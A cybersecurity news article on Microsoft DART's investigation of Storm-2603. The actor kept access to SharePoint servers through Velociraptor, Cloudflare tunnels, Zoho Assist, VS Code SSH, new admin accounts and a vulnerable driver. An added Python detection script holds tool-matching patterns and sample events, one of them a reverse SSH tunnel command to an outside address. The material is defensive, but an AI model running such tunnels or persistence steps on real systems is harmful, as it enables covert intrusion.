
Hackers Use Velociraptor, Cloudflare Tunnels, Zoho Assist, and VS Code SSH for Persistence

Cybersecurity News, June 23, 2026




By Tushar Subhra Dutta, June 23, 2026

A routine ransomware investigation turned into something far more alarming when security researchers uncovered two separate threat actors quietly sharing the same compromised environment. What started as a single intrusion quickly revealed a far more complex operation involving multiple remote access tools, tunneling software, and legitimate administrative utilities weaponized for long-term persistence inside a target network.

The attack centered on on-premises SharePoint servers, which had been under sustained pressure since mid-2025. The threat actor, tracked as Storm-2603, exploited known vulnerabilities while probing for additional entry points. Requests for sensitive files such as win.ini and web.config suggested reconnaissance for local file inclusion weaknesses, though full exploitation of that vector was not confirmed during the investigation.

Analysts at Microsoft identified the full scope of the campaign after correlating signals across identities, endpoints, and cloud infrastructure. Its Detection and Response Team (DART) uncovered the coordinated use of multiple tools to sustain access, escalate privileges, and remain hidden inside the network for an extended period without raising alarms.

Once inside, the attackers layered their access using a combination of well-known and trusted tools. Because the same tools are used for routine system administration, the activity was hard to distinguish from legitimate work, which bought the attackers time to move deeper into the network without triggering alerts.

A second, unrelated threat actor was also operating within the same environment at the same time.
That group relied on malicious DLL sideloading and custom backdoors, techniques entirely distinct from Storm-2603's. Two overlapping campaigns significantly complicated attribution and made the full scope of the intrusion harder to detect and contain.

Hackers Use Velociraptor, Cloudflare Tunnels, Zoho Assist, and VS Code SSH

Storm-2603 deployed Velociraptor, a legitimate open-source digital forensics and incident response tool, running with SYSTEM-level privileges to map the compromised environment. Because Velociraptor is widely trusted and commonly used by security teams, its presence blended in with normal administrative activity and served as effective cover for malicious activity running in plain sight.

To ensure continued remote access, the attackers configured Cloudflare tunnels. The cloudflared connector makes only outbound connections to Cloudflare's edge, so inbound firewall rules never see the attackers' traffic and it is easy to mistake for ordinary web traffic to a trusted third-party service. They also used Zoho Assist and SSH connections established through Visual Studio Code, giving them redundant access channels that would survive even if one was blocked or discovered by defenders.

Privilege escalation followed shortly after, with new local and domain administrator accounts created to lock in long-term control. A vulnerable driver was also exploited (a bring-your-own-vulnerable-driver technique) to tamper with system memory and disable security protections, further reducing the attackers' visibility to defensive tooling in the compromised environment.

Microsoft said in a report shared with Cyber Security News (CSN) that DART contained the intrusion by activating a structured response playbook, correlating telemetry across all affected systems, and holding daily briefings with the organization so that containment actions stayed timely and aligned throughout the investigation.
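The tool layering described above is what the detection advice in the next section asks teams to watch for. The following is an added example written for this page (it is not code from Microsoft's DART report or from Cyber Security News): a small Python rule set that flags the tunneling and remote-access tools named here, new accounts and admin-group additions, and driver loads from outside the system driver directory, run over a constructed set of Sysmon (event IDs 1 and 6) and Windows Security (4720, 4728, 4732) events rendered as JSON lines. The cloudflared, "code tunnel" and Velociraptor command names are real; the Zoho Assist image pattern, host names, user names, paths and addresses are assumptions made for the sample.

```python
# Added example by the page's editor, not code from Microsoft's DART report or
# the CSN article: detection rules for the access layers the article describes,
# run over a constructed sample of Sysmon and Windows Security events.
import json
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    evidence: str


# Sysmon event 1 (process creation): image / command-line patterns for the tools
# the article names. "cloudflared ... tunnel", "code tunnel" and "velociraptor"
# are the real CLI names; the Zoho Assist pattern is an assumption and must be
# confirmed against the installer actually deployed in your environment.
PROCESS_RULES = {
    "cloudflared tunnel (outbound-only C2 channel)":
        re.compile(r"\bcloudflared(\.exe)?\b.*\b(tunnel|service\s+install)\b", re.I),
    "VS Code remote tunnel / SSH": re.compile(r"\bcode(\.exe)?\b.*\btunnel\b", re.I),
    "Velociraptor agent": re.compile(r"\bvelociraptor(\.exe)?\b", re.I),
    "Zoho Assist remote support (assumed image name)":
        re.compile(r"zoho.?assist|zohomeeting", re.I),
}
VSCODE_SSH_RULE = "VS Code remote tunnel / SSH"
ADMIN_GROUPS = {"administrators", "domain admins", "enterprise admins"}
# Windows Security: 4720 = account created, 4728 / 4732 = member added to a
# global / local security-enabled group. Sysmon event 6 = driver loaded.
DRIVER_DIR = re.compile(r"^[a-z]:\\windows\\system32\\drivers\\", re.I)


def parse_events(lines):
    """One JSON object per line, as a SIEM export would provide them."""
    return [json.loads(line) for line in lines if line.strip()]


def detect(events):
    findings = []
    for ev in events:
        eid = int(ev.get("EventID", 0))
        host = ev.get("Computer", "?")
        if eid == 1:
            image, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
            parent = ev.get("ParentImage", "")
            for rule, pat in PROCESS_RULES.items():
                if pat.search(cmd) or pat.search(image):
                    findings.append(Finding(rule, host, cmd or image))
            # Remote-SSH: ssh.exe is benign on its own; VS Code as its parent is the signal.
            if image.lower().endswith("ssh.exe") and parent.lower().endswith("code.exe"):
                findings.append(Finding(VSCODE_SSH_RULE, host, f"{parent} -> {cmd}"))
        elif eid == 4720:
            findings.append(Finding("new account created", host, ev.get("TargetUserName", "")))
        elif eid in (4728, 4732):
            group = ev.get("TargetUserName", "")  # for group events this field holds the group
            if group.lower() in ADMIN_GROUPS:
                findings.append(Finding(f"member added to {group}", host, ev.get("MemberName", "")))
        elif eid == 6:
            loaded = ev.get("ImageLoaded", "")
            if not DRIVER_DIR.match(loaded):
                findings.append(Finding("driver loaded from outside System32\\drivers", host, loaded))
    return findings


# Constructed sample (not real telemetry): hosts, users, paths and addresses are placeholders.
VSCODE = r"C:\Users\svc_sp\AppData\Local\Programs\Microsoft VS Code\Code.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "SP-WEB01", "Image": r"C:\ProgramData\cloudflared.exe",
     "CommandLine": "cloudflared.exe tunnel run --token <redacted>", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "Computer": "SP-WEB01", "Image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "CommandLine": "velociraptor.exe --config client.config.yaml client", "User": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 1, "Computer": "SP-WEB01", "Image": VSCODE, "CommandLine": f'"{VSCODE}" tunnel', "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 1, "Computer": "SP-WEB01", "Image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "CommandLine": "ssh.exe -T -R 2222:127.0.0.1:3389 ops@203.0.113.10", "ParentImage": VSCODE},
    {"EventID": 1, "Computer": "SP-WEB01", "Image": r"C:\Program Files (x86)\Zoho Assist\agent.exe",
     "CommandLine": r'"C:\Program Files (x86)\Zoho Assist\agent.exe"', "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 1, "Computer": "SP-WEB01", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs", "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 4720, "Computer": "DC01", "TargetUserName": "sqlsvc2", "SubjectUserName": "svc_sp"},
    {"EventID": 4732, "Computer": "SP-WEB01", "TargetUserName": "Administrators", "MemberName": r"SP-WEB01\sqlsvc2"},
    {"EventID": 4728, "Computer": "DC01", "TargetUserName": "Domain Admins", "MemberName": "CN=sqlsvc2,CN=Users,DC=corp,DC=example"},
    {"EventID": 6, "Computer": "SP-WEB01", "ImageLoaded": r"C:\Users\Public\drv.sys", "Signed": "true"},
    {"EventID": 6, "Computer": "SP-WEB01", "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true"},
]
SAMPLE_LINES = [json.dumps(ev) for ev in SAMPLE_EVENTS]


def run_sample():
    """Findings for the constructed sample; the benign svchost and tcpip events produce none."""
    return detect(parse_events(SAMPLE_LINES))


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.host}] {f.rule}: {f.evidence}")
```

Run it directly to print the nine findings from the sample. In practice, feed it an export from your SIEM and tune PROCESS_RULES against the inventory of sanctioned tools, since the same signatures fire on legitimate administration; the value of the rules is in correlating a tunnel or RMM install with a new account, an admin-group change and an out-of-place driver load on the same host, which is the stack the article describes.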
Strengthening Defenses Against Multi-Actor Intrusions

The findings show how far threat actors will go to maintain a foothold inside a network. When two separate groups work within the same environment simultaneously, signals become mixed, attribution becomes harder, and traditional detection methods fall short of what security teams need.

Microsoft's response team emphasized that organizations should prioritize patching internet-facing systems to reduce the risk of initial access. Strengthening identity security is equally important, as credential misuse played a central role in the escalation and persistence seen throughout this investigation.

Security teams are also advised to deploy endpoint protection widely, retain telemetry centrally, and keep incident response playbooks tested and ready to activate quickly. Monitoring the use of remote access and tunneling tools is critical, since legitimate software like Velociraptor, VS Code, and Zoho Assist can be quietly abused by attackers to move undetected across a compromised network. A practical baseline is to inventory which RMM, tunneling and remote-development tools are sanctioned and to alert on any other installation, or on a sanctioned tool appearing as a newly installed service or running under an unexpected account.

Tushar Subhra Dutta is a senior cybersecurity and breach reporter covering cybersecurity news, trends, emerging threats, data breaches, and malware attacks.